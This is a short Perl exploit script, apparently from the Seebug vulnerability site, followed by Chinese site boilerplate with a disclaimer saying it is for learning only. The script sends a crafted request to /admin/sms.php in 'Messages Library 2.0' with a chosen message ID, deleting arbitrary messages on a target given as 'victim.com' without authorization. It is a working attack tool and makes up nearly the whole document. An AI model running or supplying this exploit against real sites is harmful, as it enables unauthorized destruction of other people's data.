#!/usr/bin/perl -w # Messages Library 2.0 <= Arbitrary Delete Message ######################################## #[*] Founded & Exploited by : Stack ######################################## print "\t\t############################################################\n\n"; print "\t\t# Messages Library 2.0 <= Arbitrary Delete Message #\n\n"; print "\t\t# by Stack #\n\n"; print "\t\t############################################################\n\n"; use LWP::UserAgent; die "Example: perl $0 http://victim.com/path/\n" unless @ARGV; print "\n[!] ContactID : "; chomp(my $id=<STDIN>); $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $ARGV[0] . "/admin/sms.php?Action=Delete&ID=".$id.""; $res = $b->request(HTTP::Request->new(POST=>$host)); print "\nBrought to you by v4-team.com...\n"; print "\n[+] Message Deleted \n"; # sebug.net
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论